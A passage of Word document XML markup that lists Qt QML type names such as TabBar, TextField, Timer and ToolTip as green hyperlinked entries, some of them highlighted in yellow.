            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>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r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>T</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48" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Tab</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49" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TabBar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50" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TabButton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51" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TableView</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52" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TableViewColumn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53" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TableViewStyle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54" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TabView</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55" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TabViewStyle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56" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TapReading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57" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TapSensor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58" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TargetDirection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59" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TaskbarButton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60" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Technique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61" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TestCase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62" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Text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363" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TextArea: QtQuickControls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64" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TextArea: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65" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TextAreaStyle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66" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TextEdit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67" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TextField: QtQuickControls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68" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TextField: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69" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TextFieldStyle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70" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TextInput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71" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TextMetrics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72" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TextureImage: Qt3D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73" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TextureImage: QtCanvas3D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74" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TextureImageFactory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75" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Theme3D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76" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ThemeColor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77" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ThresholdMask</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78" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ThumbnailToolBar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79" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ThumbnailToolButton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80" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TiltReading</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81" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TiltSensor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82" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TimeoutTransition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83" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Timer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84" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ToggleButton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85" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ToggleButtonStyle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86" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ToolBar: QtQuickControls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87" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ToolBar: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88" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ToolBarStyle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89" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ToolButton: QtQuickControls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90" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ToolButton: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91" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ToolSeparator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92" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ToolTip</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93" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Torch</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94" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TorusGeometry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95" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TorusMesh</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96" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TouchInputHandler3D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97" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TouchPoint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98" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Trace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399" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TraceCanvas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00" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TraceInputArea</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01" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TraceInputKey</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02" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TraceInputKeyPanel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03" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TrailEmitter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04" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Transaction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05" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Transform: QtQuick</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06" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
